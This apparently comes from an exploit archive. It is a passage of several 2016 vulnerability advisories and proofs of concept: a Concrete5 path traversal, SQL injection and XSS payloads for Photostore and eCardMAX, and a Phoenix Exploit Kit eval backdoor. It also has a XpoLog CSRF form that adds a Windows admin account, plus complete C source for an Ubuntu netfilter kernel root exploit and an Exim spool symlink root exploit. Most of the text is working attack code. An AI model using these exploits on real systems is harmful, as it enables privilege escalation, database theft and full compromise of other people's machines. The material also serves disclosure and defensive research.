332. $collection = Route::getList();
333. $context = new \Symfony\Component\Routing\RequestContext();
334. $context->fromRequest($request);
335. $matcher = new UrlMatcher($collection, $context);
336. $path = rtrim($request->getPathInfo(), '/') . '/';
337. try {
338. $request->attributes->add($matcher->match($path));
339. $matched = $matcher->match($path);
340. $route = $collection->get($matched['_route']);
341. Route::setRequest($request);
342. $response = Route::execute($route, $matched);
The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows to specify the path
for the request within some HTTP headers (like "X-Original-URL" and some others). So, it might
be possible to specify paths containing "dot-dot-slash" sequences without worrying about URL
encoding and path normalization done by the web server. This could be exploited by unauthenticated
attackers to include arbitrary .php files located outside the Concrete5 root directory or from the
Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)
by sending an HTTP request like this:
GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive
The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
[-] Solution:
Update to a fixed version.
[-] Disclosure Timeline:
[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-10
[-] Other References:
https://hackerone.com/reports/59665
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product : Photostore
Affected : Versions prior to 4.7.5
Impact : Critical
Remote : Yes
Website link: http://www.ktools.net
Reported : 02/06/2016
Authors : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application password recovery module is prone to a blind sql injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
Vulnerable code is located in the mgr.login.php file:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
$result = ;
mysqli_num_rows( $result );
$returned_rows = ;
mysqli_fetch_array( $result );
$db_admin_user = ;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
# Vuln file : geoip.php
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
# Screen : http://i.imgur.com/E7RBBRk.png
__END__
XpoLog Center V6 CSRF Remote Command Execution
Vendor: XpoLog LTD
Product web page: http://www.xpolog.com
Affected version: 6.4469
6.4254
6.4252
6.4250
6.4237
6.4235
5.4018
Summary: Applications Log Analysis and Management Platform.
Desc: XpoLog suffers from arbitrary command execution. Attackers
can exploit this issue using the task tool feature and adding a
command with respected arguments to given binary for execution.
In combination with the CSRF an attacker can execute system commands
with SYSTEM privileges.
Tested on: Apache-Coyote/1.1
Microsoft Windows Server 2012
Microsoft Windows 7 Professional SP1 EN 64bit
Java/1.7.0_45
Java/1.8.0.91
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5335
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php
14.06.2016
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
<html>
<body>
<form action="http://10.0.0.17:30303/logeye/tasks/xpotaskDefinitionAction.jsp?" method="POST">
<input type="hidden" name="" value="" />
<input type="hidden" name="csrfToken" value="NoToken" />
<input type="hidden" name="taskId" value="1465930398522" />
<input type="hidden" name="taskType" value="exe" />
<input type="hidden" name="name" value="CCMMDD" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="IsSsh" value="false" />
<input type="hidden" name="exePath" value=""c:\\windows\\system32\\cmd.exe"" />
<input type="hidden" name="exeArgs" value=""/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"" />
<input type="hidden" name="exeEnvVar" value="" />
<input type="hidden" name="exeWorkDir" value="" />
<input type="hidden" name="exeOutputTargetFile" value="" />
<input type="hidden" name="NameXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="IdXpoTaskSched" value="taskId_1465930366962" />
<input type="hidden" name="actionIdXpoTaskSched" value="0" />
<input type="hidden" name="StateXpoTaskSched" value="1" />
<input type="hidden" name="schedulerSuffix" value="XpoTaskSched" />
<input type="hidden" name="trigTypeXpoTaskSched" value="cron" />
<input type="hidden" name="minutesXpoTaskSched" value="0" />
<input type="hidden" name="minutesEndXpoTaskSched" value="0" />
<input type="hidden" name="numOfExecutionsXpoTaskSched" value="0" />
<input type="hidden" name="frequencyXpoTaskSched" value="daily" />
<input type="hidden" name="DayInMonthXpoTaskSched" value="all" />
<input type="hidden" name="dailyTypeXpoTaskSched" value="repeat" />
<input type="hidden" name="dailyRepeatValueXpoTaskSched" value="1" />
<input type="hidden" name="dailyRepeatTypeXpoTaskSched" value="second" />
<input type="hidden" name="hoursXpoTaskSched" value="0" />
<input type="hidden" name="hoursEndXpoTaskSched" value="0" />
<input type="hidden" name="hoursOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="minutesOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="secondsOnce0XpoTaskSched" value="-1" />
<input type="hidden" name="jobPriority" value="-1" />
<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
GET
http://10.0.0.17:30303/logeye/testingus.txt
Response:
nt authority\system
/*
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip
*/
--------------------------------------------------- decr.c ---------------------------------------------------
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MALLOC_SIZE 66*1024
int check_smaep() {
FILE *proc_cpuinfo;
char fbuf[512];
proc_cpuinfo = fopen("/proc/cpuinfo", "r");
if (proc_cpuinfo < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
fclose(proc_cpuinfo);
return -1;
}
}
fclose(proc_cpuinfo);
return 0;
}
int check_mod() {
FILE *proc_modules;
char fbuf[256];
proc_modules = fopen("/proc/modules", "r");
if (proc_modules < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 256, proc_modules) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (!strncmp("ip_tables", fbuf, 9)) {
fclose(proc_modules);
return 0;
}
}
fclose(proc_modules);
return -1;
}
int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;
sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("socket");
return -1;
}
data = malloc(MALLOC_SIZE);
if (data == NULL) {
perror("malloc");
return -1;
}
memset(data, 0, MALLOC_SIZE);
repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;
entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
strcpy(ematch->u.user.name, "icmp");
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!
uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;
ematch->u.match_size = (short)0xffff;
target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;
printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
for (i = 0; i < 0xffffff/2+1; i++) {
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
}
close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");
return 0;
}
int main(void) {
void *stack;
int ret;
printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
if (check_mod()) {
printf("[-] No ip_tables module found! Quitting...\n");
return -1;
}
if (check_smaep()) {
printf("[-] SMEP/SMAP support dectected! Quitting...\n");
return -1;
}
ret = unshare(CLONE_NEWUSER);
if (ret == -1) {
perror("unshare");
return -1;
}
stack = (void *) malloc(65536);
if (stack == NULL) {
perror("malloc");
return -1;
}
clone(decr, stack + 65536, CLONE_NEWNET, NULL);
sleep(1);
return 0;
}
--------------------------------------------------- pwn.c ---------------------------------------------------
/**
* Run ./decr first!
*
* 23/04/2016
* - vnik
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
void __attribute__((regparm(3))) privesc() {
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
int main() {
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);
void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
memset(shellcode, 0, 0x300000);
void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);
printf("[+] Escalating privs...\n");
int fd = open("/dev/ptmx", O_RDWR);
close(fd);
assert(!getuid());
printf("[+] We've got root!");
return execl("/bin/bash", "-sh", NULL);
}
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities
# Bug discovered by Yakir Wizman
# Date 01/07/2016
# Affected versions prior to 4.7.5
# Vendor Homepage - http://www.ktools.net
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Author will be not responsible for any damage.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# About the Application:
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow:
#
# Sell various sizes or formats of the same photo.
# Sell photos, vector art, zip files and more.
# Sell videos PhotoStore Pro Only
# Sell prints, artwork, products, packages, digital collections and more.
# Built in shopping cart and ecommerce system to accept credit cards and/or check payments.
# Email notifications to both you and the customer upon purchase.
# Customers can instantly download after payment.
# Customers can instantly download their files after payment.
# Connects to PayPal and 2Checkout.
# Built in credit system to allow your customers to buy credits.
# Allow your members to upload and sell their photos and other media while you take a commission.
# The vulnerabilities which are described bellow does not require any legitimate user to exploit them.
# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them.
# A potentially attacker can exploit those vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability).
# SQL Injection (error based) Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# SQL Injection (Severity is Critical)
# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query.
# Request Data #1 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://www.example.net/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: www.ktoolsdemos.net
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 221
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD]
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
###
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
###
# The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query.
# Request Data #2 is:
POST /photostore/gallery/Objects/24/page1/ HTTP/1.1
Cache-Control: no-cache
Referer: http://server/photostore/gallery/Objects/24/page1/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Language: en-us,en;q=0.5
Host: server
Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc
# Inserted payload for example:
postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc
# Cross Site Scripting Proof—Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# XSS (Severity is Medium)
# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application
#
# In Order to exploit this vulnerability, the URL should be like the following examples:
#
# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“><script>alert(/XSS/)</script>
# http://server/photostore/manager/mgr.login.php?username=demo&password='><script>alert("XSS")</script><input type='hidden
# Full path disclosure Proof-Of-Concept
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# FPD (Severity is low/info)
# The vulnerable parameter is “photoID” in “productshot.php” file which is partially sanitized and therefor an attacker could exploit this only to full path disclosure.
#
# In order to exploit this vulnerability, the url should be like the following example:
#
# http://server/photostore/productshot.php?itemID=1&itemType=prod&photoID=%2f&size=125
/*
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Hello List,
This is just a minor issue in Exim, no replies so far, so publication
should be OK.
Introduction:
============
Exim4 in some variants is started as root but switches to uid/gid
Debian-exim/Debian-exim. But as Exim might need to store received
messages in user mailboxes, it has to have the ability to regain
privileges. This is also true when Exim is started as "sendmail".
During internal operation, sendmail (Exim) will manipulate message
spool files in directory structures owned by user "Debian-exim"
without caring about symlink attacks. Thus execution of code as
user "Debian-exim" can be used to gain root privileges by invoking
"sendmail" as user "Debian-exim".
POC:
===
http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c
demonstrates the issue using a ELF file being both executable
and shared library which is invoked multiple times by different
processes.
Results, Discussion:
===================
As Exim4 process itself is already quite privileged - it has to
access the user mailboxes with different UIDs anyway - the having
such problems is expectable and explainable. A change in documentation
might make sense, to indicate, that the special user "Debian-exim"
is only intended to mark files being used by the daemon, but not
to provide root/daemon user privilege separation.
Even without this vulnerability, a "Debian-exim" process could
use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
to escalate to "adm" group, which again makes it very likely to
use "syslog", "apache" or other components to escalate to root
via "/var/log". This is annoying, perhaps this should get a CVE
to make daemon-to-root escalations harder in general.
Timeline:
========
20160605: Discovery, report Debian security
20160607: Writeup
20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
20160630: Publication
References:
==========
* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/
-----BEGIN PGP SIGNATURE-----
iEYEAREKAAYFAld0lPUACgkQxFmThv7tq+5MeACePVuh5CppGyhUudMfK7kjDXjj
8mcAn2AcZFVEwUKSHadffJJyCNLP0X7H
=4IJk
-----END PGP SIGNATURE-----
* This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/
* for more information.
*
* Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry
* Use: Run as "Debian-exim": ./EximUpgrade --Upgrade
*/
#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
#define UPGRADE_FILE_NAME "/var/spool/exim4/EximUpgrade"
#define UPGRADE_LIB_DIR "/var/spool/exim4"
#define TARGET_PATH "/lib/x86_64-linux-gnu/libpam.so.0.83.1"
extern char **environ;
#if defined(__x86_64__)
const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
#define init_args(argc, argv) __asm__ volatile ( \
"mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \
:"=m"(argc), "=r"(argv)::"memory")
#endif /* __x86_64__ */
/** Library initialization function, called by the linker. If not
* named _init, parameter has to be set during linking using -init=name
*/
extern void _libInit() {
if(geteuid()!=0) return;
int result=chown(UPGRADE_FILE_NAME, 0, 0);
assert(!result);
result=chmod(UPGRADE_FILE_NAME, 04755);
assert(!result);
exit(0);
}
extern void _entry (void) {
int argc=0;
char **argv = NULL;
init_args(argc, argv);
int result=main(argc, argv);
exit(result);
}
extern void pam_start() {}
extern void pam_set_item() {}
extern void pam_chauthtok() {}
extern void pam_end() {}
extern void pam_strerror() {}
extern void pam_getenvlist() {}
extern void pam_open_session() {}
extern void pam_close_session() {}
extern void pam_get_item() {}
extern void pam_acct_mgmt() {}
extern void pam_setcred() {}
extern void pam_authenticate() {}
int main(int argc, char **argv) {
DIR *dirStruct;
struct dirent *dirEnt;
char linkPath[1024];
int result;
assert(argc>1);
if(!strcmp(argv[1], "--Exec")) {
setresgid(0, 0, 0);
setresuid(0, 0, 0);
execve(argv[2], argv+2, environ);
fprintf(stderr, "Exec failed\n");
return(1);
}
if(!strcmp(argv[1], "--Repair")) {
int targetFd=open(TARGET_PATH, O_RDWR);
assert(targetFd>=0);
result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3]));
assert(!result);
chmod(TARGET_PATH, atoi(argv[4]));
return(0);
}
if(!strcmp(argv[1], "--Upgrade")) {
struct stat origStatData;
stat(TARGET_PATH, &origStatData);
char *execArgs[6];
int childPid=fork();
if(!childPid) {
int inputFd=open("/dev/null", O_RDONLY);
dup2(inputFd, 0);
execArgs[0]="/usr/sbin/sendmail";
execArgs[1]="root@localhost";
execArgs[2]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
dirStruct=opendir("/var/spool/exim4/msglog");
assert(dirStruct);
result=1;
while(result) {
while((dirEnt=readdir(dirStruct))) {
if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
strncpy(linkPath+23, dirEnt->d_name, 16);
result=symlink(TARGET_PATH, linkPath);
assert(!result);
fprintf(stderr, "Relinked %s\n", linkPath);
break;
}
rewinddir(dirStruct);
}
closedir(dirStruct);
while(1) {
struct stat currentStatData;
stat(TARGET_PATH, ¤tStatData);
if(currentStatData.st_uid!=origStatData.st_uid) break;
sleep(1);
}
waitpid(childPid, NULL, 0);
fprintf(stderr, "Target ready for writing\n");
int targetFd=open(TARGET_PATH, O_RDWR);
assert(targetFd>=0);
char *origData=(char*)malloc(origStatData.st_size);
result=read(targetFd, origData, origStatData.st_size);
assert(result==origStatData.st_size);
struct stat newStatData;
stat(UPGRADE_FILE_NAME, &newStatData);
char *newData=(char*)malloc(newStatData.st_size);
int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY);
result=read(selfFd, newData, newStatData.st_size);
assert(result==newStatData.st_size);
close(selfFd);
ftruncate(targetFd, 0);
lseek(targetFd, 0, SEEK_SET);
result=write(targetFd, newData, newStatData.st_size);
assert(result==newStatData.st_size);
fsync(targetFd);
childPid=fork();
if(!childPid) {
execArgs[0]="/bin/su";
execArgs[1]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
waitpid(childPid, NULL, 0);
ftruncate(targetFd, 0);
lseek(targetFd, 0, SEEK_SET);
result=write(targetFd, origData, origStatData.st_size);
close(targetFd);
childPid=fork();
if(!childPid) {
char numbers[128];
char *ptr=numbers;
execArgs[0]=UPGRADE_FILE_NAME;
execArgs[1]="--Repair";
result=sprintf(ptr, "%d", origStatData.st_uid);
execArgs[2]=ptr; ptr+=result+1;
result=sprintf(ptr, "%d", origStatData.st_gid);
execArgs[3]=ptr; ptr+=result+1;
result=sprintf(ptr, "%d", origStatData.st_mode);
execArgs[4]=ptr;
execArgs[5]=NULL;
result=execve(execArgs[0], execArgs, environ);
assert(!result);
return(0);
}
waitpid(childPid, NULL, 0);
execArgs[0]=UPGRADE_FILE_NAME;
execArgs[1]="--Exec";
execArgs[2]="/bin/bash";
execArgs[3]="-c";
execArgs[4]="id; exec $0";
execArgs[5]=NULL;
execve(execArgs[0], execArgs, environ);
return(1);
}
fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]);
return(1);
}
Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php
eCardMAX 10.5 SQL Injection and XSS Vulnerabilities
[Software]
- eCardMAX 10.5
[Vendor]
- eCardMAX.COM - http://www.ecardmax.com/
[Vendor Product Description]
- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your
own ecard website with many of the advanced features found on other major sites. Starting your own ecard website
with eCardMax is fast and easy.
[Advisory Timeline]
- 13/06/2016 -> Vulnerability discovered;
- 13/06/2016 -> First contact with vendor;
- 13/06/2016 -> Vendor responds asking for details;
- 14/06/2016 -> Vulnerability details sent to the vendor;
- 17/06/2016 -> Vendor working on a patch;
- 28/06/2016 -> Vendor Releases Patch
- 01/07/2016 -> Public Security Advisory Published
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Reflected)
[Impact]
- High
[Affected Version]
- v10.5
[Tested on]
- Apache/2.2.26
- PHP/5.3.28
- MySQL/5.5.49-cll
[Bug Description and Proof of Concept]
- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters
is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
[Proof-of-Concept]
1. SQL Injection:
Parameter: row_number (GET)
POC URL:
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Reflected):
http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User
Parameter(s): keyword (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
Parameter(s): page (GET)
http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2
